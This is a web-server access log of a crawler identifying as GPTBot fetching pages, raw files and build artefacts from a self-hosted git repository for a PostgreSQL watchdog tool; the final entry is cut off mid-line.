"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor" +[17/Feb/2026:13:09:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor" +[17/Feb/2026:13:09:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 10837] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor" +[17/Feb/2026:13:09:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 16528] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor" +[17/Feb/2026:13:09:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 11966] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor" +[17/Feb/2026:13:09:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/README.md" [Client 74.7.227.38] [Length 10948] [Gzip 3.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/README.md" +[17/Feb/2026:13:09:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 10155] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/i18n.js" +[17/Feb/2026:13:09:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/README.md" [Client 74.7.227.38] [Length 10952] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/README.md" +[17/Feb/2026:13:09:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/commit/83e7d939e386dd9b236553115441a2075fc8fe7f" [Client 74.7.227.38] [Length 7487] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f" +[17/Feb/2026:13:09:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/README.md" +[17/Feb/2026:13:09:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/.gitignore" [Client 74.7.227.38] [Length 500] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/.gitignore" +[17/Feb/2026:13:09:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 10166] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:13:09:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 711] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:13:09:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build" [Client 74.7.227.38] [Length 9817] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 11750] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:13:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 10139] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:13:09:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist" [Client 74.7.227.38] [Length 9910] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist" +[17/Feb/2026:13:09:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 10148] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/watchdog.py" +[17/Feb/2026:13:09:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 10168] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:09:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 10430] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:09:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/.gitignore" [Client 74.7.227.38] [Length 11836] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/.gitignore" +[17/Feb/2026:13:09:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/.gitignore" [Client 74.7.227.38] [Length 10137] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/.gitignore" +[17/Feb/2026:13:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 12224] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:13:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 10947] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build" [Client 74.7.227.38] [Length 10136] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build" +[17/Feb/2026:13:09:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 11372] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:13:09:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 17738] [Gzip 9.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/watchdog.py" +[17/Feb/2026:13:09:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/dist" [Client 74.7.227.38] [Length 9917] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist" +[17/Feb/2026:13:09:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 4806] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/watchdog.py" +[17/Feb/2026:13:09:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 10713] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:09:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:09:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10999] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:09:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 806] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:13:09:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 673] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:13:09:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 9910] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:13:09:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build" [Client 74.7.227.38] [Length 9834] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build" +[17/Feb/2026:13:09:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 9539] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:13:09:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 8597989] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:13:09:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/dist" [Client 74.7.227.38] [Length 9881] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/dist" +[17/Feb/2026:13:09:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 9956] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:13:09:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 9915] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:09:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 10390] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:09:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 13036] [Gzip 6.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:13:09:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1069] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:13:09:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9979] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:13:09:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 11649] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:13:09:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build" [Client 74.7.227.38] [Length 9887] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build" +[17/Feb/2026:13:09:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 10912] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:09:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10998] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:09:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 10915] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/dist" +[17/Feb/2026:13:09:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10998] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:09:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10996] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 